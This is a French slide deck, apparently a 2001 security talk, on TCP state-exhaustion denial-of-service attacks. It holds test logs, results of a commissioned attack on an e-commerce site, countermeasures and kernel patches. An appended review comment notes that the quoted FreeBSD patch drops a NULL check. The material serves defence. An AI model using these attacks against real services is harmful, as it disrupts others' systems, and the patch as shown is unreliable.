Ça ne va toujours pas : Tue Mar 20 11:55:50 CET 2001 18401 129 Tue Mar 20 11:56:05 CET 2001 18401 43 %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Contre linux 2.2.17 %font "code" LAST_ACK SYN_RECV -------- -------- Le début de la libération : Tue Mar 20 12:04:15 CET 2001 18401 Tue Mar 20 12:04:29 CET 2001 18189 Pour tout libérer, c'est long ... Tue Mar 20 12:10:22 CET 2001 4151 Tue Mar 20 12:10:23 CET 2001 4105 Enfin :) Tue Mar 20 12:12:29 CET 2001 13 Tue Mar 20 12:12:29 CET 2001 %font "def" Conclusion du test quelques minutes pour bloquer un service 15 min pour libérer le premier LAST_ACK, 8 min pour tout libérer Autres systèmes vulnérables : Win NT/2000, FreeBSD, NetBSD, AIX Seul OpenBSD semble résister ! %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Test grandeur réelle HSC mandaté par un client Contre un site de commerce électronique Plage horaire : la nuit hors production Architecture distante Seul port ouvert : HTTPS Filtrage routeur cisco + checkpoint firewall-1 Éléments redondants et boîtiers alteon Serveurs Web : netscape enterprise server sous AIX Résultats Depuis 1 puis 2 machines pentium (200 et 300 MHz) Moins d'1/4 d'heure pour bloquer l'établissement SSL Un peu plus de 3/4 d'heure pour bloquer le site au niveau TCP L'attaque était réalisée depuis une seule machine Les boîtiers alteon faisaient de l'équilibrage de charge selon l'adresse IP source %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques éléments de réponse Contre les DOS Sécurisation des systèmes Mise à jour des systèmes Filtrage IP (ACL, Anti-spoofing ...) Tests (Nessus ...) 
Contre les DDOS rfc2267 : Network Ingress Filtering (spoofing) rfc2644 : Directed Broadcasts rfc3013 : Recommended ISP Security Services and Procedures ftp://www.ietf.org/rfc/rfc3013.txt Dave Dittrich http://staff.washington.edu/dittrich/misc/ddos/ Prévoir les DDOS dans l'architecture redondance, équilibrage de charges, trou noir dans le routage ... Rechercher les DDOS Nessus, dds, rid, gag, ramenfind, lionfind, chkrootkit, rkscan ... Détecter les DDOS (Snort) Plus tard ICMP traceback de Steve Bellovin http://www.research.att.com/~smb/talks/nanog-dos/index.htm %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques éléments de réponse Contre les attaques sur TCP Exemple de patch : From: thinker Subject: Hang forever at LAST_ACK To: freebsd-security@freebsd.org %font "code", size 2 --------- begin patch file of sys/netinet/tcp_usrreq.c ---------- --- tcp_usrreq.c.orig Thu Mar 22 14:59:45 2001 +++ tcp_usrreq.c Thu Mar 22 15:04:49 2001 
@@ -1139,13 +1139,15 @@ tp->t_state = TCPS_LAST_ACK; break; } - if (tp && tp->t_state >= TCPS_FIN_WAIT_2) { + if (tp && tp->t_state >= TCPS_FIN_WAIT_2) soisdisconnected(tp->t_inpcb->inp_socket); - /* To prevent the connection hanging in FIN_WAIT_2 forever. */ - if (tp->t_state == TCPS_FIN_WAIT_2) - callout_reset(tp->tt_2msl, tcp_maxidle, - tcp_timer_2msl, tp); - } + /* + * To prevent the connection hanging in FIN_WAIT_2 & + * TCPS_LAST_ACK forever. + */ + if (tp->t_state == TCPS_FIN_WAIT_2 || tp->t_state == TCPS_LAST_ACK) + callout_reset(tp->tt_2msl, tcp_maxidle, + tcp_timer_2msl, tp); return (tp); } %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques éléments de réponse Contre les attaques sur TCP Idée de Denis Ducamp Considérer les FIN comme des RST dans certains états (Ca n'empeche pas les shutup) %font "code" /* TCP_SYN_SENT */ TCP_CLOSE, - /* TCP_SYN_RECV */ TCP_FIN_WAIT1 | TCP_ACTION_FIN, + /* TCP_SYN_RECV */ TCP_CLOSE, /* TCP_FIN_WAIT1 */ TCP_FIN_WAIT1, %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques éléments de réponse Contre les attaques sur TCP Patch de NetBSD 1.5 (contre Naptha) %font "code" /* * Ack processing. */ switch (tp->t_state) { /* * In SYN_RECEIVED state if the ack ACKs our SYN then enter * ESTABLISHED state and continue processing, otherwise * send an RST. */ case TCPS_SYN_RECEIVED: /* * Simple protection against FIN|ACK in that state * (Stephane Aubert - HSC - 23/03/2001) */ if ((tiflags & TH_FIN) == 1 || SEQ_GT(tp->snd_una, th->th_ack) || SEQ_GT(th->th_ack, tp->snd_max)) goto dropwithreset; tcpstat.tcps_connects++; soisconnected(so); tcp_established(tp); %font "def" Le reste ... reste à trouver ! %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Questions / Réponses %vgap 10 Merci. %fore "darkgrey", right %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
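Review bot: Once the braces come off, the new `if (tp->t_state == TCPS_FIN_WAIT_2 || tp->t_state == TCPS_LAST_ACK)` dereferences `tp` outside the `tp &&` guard that the removed block kept around both statements, so a NULL `tp` that previously fell through to `return (tp)` would now fault before reaching it. Keep the null check on the moved condition: `if (tp && (tp->t_state == TCPS_FIN_WAIT_2 || tp->t_state == TCPS_LAST_ACK))`. Whether `tp` can actually be NULL at this point is not visible from the hunk, but the guard retained on the `soisdisconnected` line suggests the author believed it could. The enclosing function starts outside the hunk.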